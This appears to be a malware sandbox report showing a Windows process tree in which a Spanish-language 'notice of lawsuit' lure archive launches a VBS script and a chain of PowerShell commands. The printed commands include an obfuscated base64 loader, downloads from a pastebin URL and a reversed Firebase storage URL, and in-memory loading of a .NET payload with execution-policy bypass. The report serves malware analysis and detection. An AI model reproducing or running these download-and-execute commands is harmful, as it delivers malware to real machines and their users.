- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:3916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:3016
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5632 /prefetch:8
  2⤵
  PID:1716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,1858527739911747589,9165731759345916004,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5436 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2156

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5380

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000\" -spe -an -ai#7zMap23176:142:7zEvent26643
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5488

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000\NOTIFICACION_DE_DEMANDA#28102024103000000.vbs"
1⤵
- Checks computer location settings
PID:5944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bl☹HY☹eQBi☹Gc☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹agBj☹HI☹dQBp☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Hc☹ZgBq☹Gw☹dQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹dwBm☹Go☹b☹B1☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBm☹GU☹YgBi☹GU☹NQBl☹GQ☹Zg☹y☹GQ☹Zg☹t☹Dk☹ZQ☹y☹GI☹LQ☹5☹DE☹Z☹☹0☹C0☹Yg☹z☹GQ☹Yg☹t☹Dc☹YwBm☹DY☹MwBk☹DI☹N☹☹9☹G4☹ZQBr☹G8☹d☹☹m☹GE☹aQBk☹GU☹bQ☹9☹HQ☹b☹Bh☹D8☹d☹B4☹HQ☹Lg☹0☹DI☹M☹☹y☹C0☹M☹☹x☹C0☹Mw☹y☹C0☹d☹Bh☹HI☹YwBk☹C8☹bw☹v☹G0☹bwBj☹C4☹d☹Bv☹H☹☹cwBw☹H☹☹YQ☹u☹DM☹M☹☹y☹DI☹Nw☹t☹GU☹cgBi☹HU☹d☹Bj☹G8☹LwBi☹C8☹M☹B2☹C8☹bQBv☹GM☹LgBz☹Gk☹c☹Bh☹GU☹b☹Bn☹G8☹bwBn☹C4☹ZQBn☹GE☹cgBv☹HQ☹cwBl☹HM☹YQBi☹GU☹cgBp☹GY☹Lw☹v☹Do☹cwBw☹HQ☹d☹Bo☹Cc☹I☹☹s☹C☹☹J☹Bq☹GM☹cgB1☹Gk☹I☹☹s☹C☹☹JwBf☹F8☹XwB5☹GY☹dgBu☹GY☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹C0☹LQ☹t☹C0☹LQ☹t☹C0☹Jw☹s☹C☹☹J☹Bl☹HY☹eQBi☹Gc☹L☹☹g☹Cc☹MQ☹n☹Cw☹I☹☹n☹FI☹bwBk☹GE☹Jw☹g☹Ck☹KQ☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000\NOTIFICACION_DE_DEMANDA#28102024103000000.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$evybg = '0' ;$jcrui = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000\NOTIFICACION_DE_DEMANDA#28102024103000000.vbs' ;[Byte[]] $wfjlu = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($wfjlu).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('febbe5edf2df-9e2b-91d4-b3db-7cf63d24=nekot&aidem=tla?txt.4202-01-32-tarcd/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $jcrui , '___yfvnf_________________________________________-------', $evybg, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:3176
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2908
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5040
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asyn-29-10-2024.vbs"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6012
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asyn-29-10-2024.vbs"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asyn-29-10-2024.vbs"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Br☹HM☹c☹Bk☹GE☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹YQBk☹Gc☹a☹Bs☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gs☹cQBj☹Go☹Yw☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹awBx☹GM☹agBj☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹4☹DQ☹MgBh☹DQ☹Yg☹0☹DI☹Mg☹2☹Dk☹NQ☹t☹Dc☹OQ☹1☹Dg☹LQ☹x☹D☹☹Yg☹0☹C0☹Yg☹x☹GI☹N☹☹t☹DI☹Mg☹2☹GY☹Mg☹w☹DQ☹Zg☹9☹G4☹ZQBr☹G8☹d☹☹m☹GE☹aQBk☹GU☹bQ☹9☹HQ☹b☹Bh☹D8☹d☹B4☹HQ☹Lg☹0☹DI☹M☹☹y☹C0☹M☹☹x☹C0☹Mw☹y☹C0☹bgB5☹HM☹YQ☹v☹G8☹LwBt☹G8☹Yw☹u☹HQ☹bwBw☹HM☹c☹Bw☹GE☹Lg☹z☹D☹☹Mg☹y☹Dc☹LQBl☹HI☹YgB1☹HQ☹YwBv☹C8☹Yg☹v☹D☹☹dg☹v☹G0☹bwBj☹C4☹cwBp☹H☹☹YQBl☹Gw☹ZwBv☹G8☹Zw☹u☹GU☹ZwBh☹HI☹bwB0☹HM☹ZQBz☹GE☹YgBl☹HI☹aQBm☹C8☹Lw☹6☹HM☹c☹B0☹HQ☹a☹☹n☹C☹☹L☹☹g☹CQ☹YQBk☹Gc☹a☹Bs☹C☹☹L☹☹g☹Cc☹YwBx☹Gg☹agBr☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹C0☹LQ☹t☹C0☹LQ☹t☹C0☹Jw☹s☹C☹☹J☹Br☹HM☹c☹Bk☹GE☹L☹☹g☹Cc☹MQ☹n☹Cw☹I☹☹n☹FI☹bwBk☹GE☹Jw☹g☹Ck☹KQ☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\asyn-29-10-2024.vbs');powershell $Yolopolhggobek;
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$kspda = '0' ;$adghl = 'C:\Users\Admin\AppData\Local\Temp\asyn-29-10-2024.vbs' ;[Byte[]] $kqcjc = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($kqcjc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('842a4b422695-7958-10b4-b1b4-226f204f=nekot&aidem=tla?txt.4202-01-32-nysa/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $adghl , 'cqhjk_______________________________________-------', $kspda, '1', 'Roda' ));"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6116
        
        C:\Windows\SysWOW64\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        10⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5396
        
